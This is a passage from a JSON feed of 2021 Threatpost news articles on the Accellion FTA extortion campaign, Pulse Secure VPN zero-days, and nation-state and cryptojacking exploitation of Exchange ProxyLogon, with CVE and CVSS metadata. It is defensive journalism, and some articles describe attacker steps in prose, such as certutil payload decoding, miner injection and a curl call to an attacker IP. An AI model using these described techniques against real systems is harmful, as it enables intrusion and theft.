email account, to a small number of addresses at the victim organization. If the victim did not respond in a timely manner, more emails are sent, this time to hundreds or thousands of different email accounts, using varied SMTP infrastructure.\n\n\n\nThe initial extortion note sent to victims of the Accellion FTA attacks. Source: FireEye Mandiant.\n\n\u201cIn at least one case, UNC2582 also sent emails to partners of the victim organization that included links to the stolen data and negotiation chat,\u201d according to Mandiant.\n\nThe firm also found through monitoring the CL0P^_- LEAKS shaming website that UNC2582 has followed through on threats to publish stolen data.\n\n\u201cSeveral new victims have appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted,\u201d according to Mandiant.\n\n## **FIN11, Clop and UNC2546**\n\nFIN11 is a financially motivated group that has been around for at least four years, conducting widespread phishing campaigns. However, it continues to evolve. It added the use of Clop ([which emerged](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/>) in February 2019) [and double extortion in October](<https://threatpost.com/fin11-gang-double-extortion-ransomware/160089/>); and added point-of-sale (POS) malware to its arsenal in 2018. In 2019, it started conducting run-of-the-mill ransomware attacks.\n\nMandiant has previously found that FIN11 threatened to post stolen victim data on the same .onion site used in the Accellion FTA attacks, usually in a double-extortion demand following the deployment of Clop ransomware. However, researchers found that the cybercriminals involved in these latest attacks are likely distinct from FIN11 itself despite sharing some overlaps.\n\n\u201cWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies running the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582,\u201d according to Mandiant. \u201cWe have identified overlaps between UNC2582, UNC2546 and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.\u201d\n\nSome of the overlaps between UNC2582\u2019s data-theft extortion activity and prior FIN11 operations include common email senders.\n\n\u201cSome UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group,\u201d according to the analysis.\n\nFIN11 has also used same the CL0P^_- LEAKS shaming site and is known for deploying Clop ransomware.\n\n\u201cThe UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page,\u201d according to Mandiant. \u201cThe linked websites were the same ones used to support historical Clop operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\u201d\n\nWhen it comes to the zero-day cluster of activity, attributed to UNC2546, there are also limited overlaps with FIN11. Specifically, many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n\nAnd, \u201can IP address that communicated with a DEWMODE web shell was in the \u2018Fortunix Networks L.P.\u2019 netblock, a network frequently used by FIN11 to host download and [FRIENDSPEAK command-and-control (C2) domains](<https://threatpost.com/us-finance-sector-targeted-backdoor-campaign/152634/>).\u201d\n\nThere\u2019s also a connection between UNC2546 and UNC2582, the firm found: In at least one case, the UNC2546 attackers interacted with DEWMODE from a host that was used to send UNC2582-attributed extortion email.\n\n\u201cThe overlaps between FIN11, UNC2546 and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships,\u201d Mandiant concluded. \u201cOne of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks.\u201d\n\nAlso, using SQL injection to deploy DEWMODE would represent a significant shift in FIN11 TTPs, \u201cgiven the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities,\u201d Mandiant added.\n\n### _Is your small- to medium-sized business an easy mark for attackers? _\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n\n** **\n", "cvss3": {}, "published": "2021-02-22T17:51:20", "type": "threatpost", "title": "Accellion FTA Zero-Day Attacks Tied to Clop, FIN11", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T17:51:20", "id": "THREATPOST:3661EA0D8FCA17978A471DB91405999A", "href": "https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-04T17:56:13", "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T17:42:30", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face 